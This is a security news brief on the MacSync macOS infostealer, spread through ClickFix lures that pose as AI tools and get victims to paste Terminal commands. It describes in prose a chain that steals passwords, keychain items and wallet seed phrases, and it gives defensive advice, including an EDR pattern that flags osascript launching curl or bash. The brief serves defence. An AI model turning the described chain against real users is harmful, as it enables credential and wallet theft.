MacSync spreads via fake AI tools

Sophos reported(sophos.com) that three distinct ClickFix campaigns ran from November 2025 through February 2026, using Google‑sponsored search results and shared ChatGPT conversations as lures to persuade victims to paste obfuscated Terminal commands. The Cloud Security Alliance documented attacker infrastructure of more than 250 compromised WordPress sites across 12 countries in its March 16, 2026 research note, attributing that scale to the ClickFix delivery model’s reuse of cloned and SEO‑poisoned landing pages. (labs.cloudsecurityalliance.org) Jamf Threat Labs published a December 22, 2025 analysis of a code‑signed, notarized Swift variant packaged in a 25.5MB DMG that carried Developer Team ID GNJLS3UYZ4, and Jamf reported the associated certificate was later revoked after disclosure. (jamf.com) Microsoft Defender researchers observed MacSync alongside other macOS infostealers such as DigitStealer and AMOS in February 2026, noting these campaigns have been active since late 2025 and that threat actors are leveraging fileless execution and native macOS utilities for credential harvesting. (microsoft.com) Technical telemetry from Sophos and iSec shows the typical chain: a pasted command downloads an obfuscated Bash loader that retrieves AppleScript payloads which prompt for system passwords and then execute in memory to exfiltrate browser sessions, keychain items and wallet seed phrases. (sophos.com) Sophos specifically recommended blocking Terminal for standard accounts via MDM, deploying Privacy Preferences Policy Control rules to pre‑deny Terminal Full Disk Access, and adding EDR rules that flag osascript spawning curl or bash child processes (the parent→child T1059.002→T1059.004 chain) as actionable detections. (sophos.com)